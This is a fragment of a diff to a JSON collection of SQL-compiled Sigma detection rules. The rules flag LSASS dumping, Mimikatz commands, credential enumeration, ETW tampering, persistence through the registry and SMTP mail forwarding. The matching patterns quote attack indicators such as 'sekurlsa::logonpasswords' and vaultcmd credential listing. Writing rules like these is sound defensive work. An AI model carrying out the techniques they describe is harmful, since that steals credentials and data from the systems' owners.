"Detects loading of diagcab 
packages from a remote path, as seen in DogWalk vulnerability", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files 
(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": 
"experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": 
"189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", - "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", 
"tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "status": "experimental", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.006" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace 
LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Potential Shellcode Injection", - "id": 
"250ae82f-736e-4844-a68b-0b5e8cc887da", - "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' 
ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in 
modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.exfiltration" ], "falsepositives": [ - "Likely" + "Legitimate usage of the cmdlet to forward emails" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows 
Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR 
(GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects SyncAppvPublishingServer process execution which 
usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." 
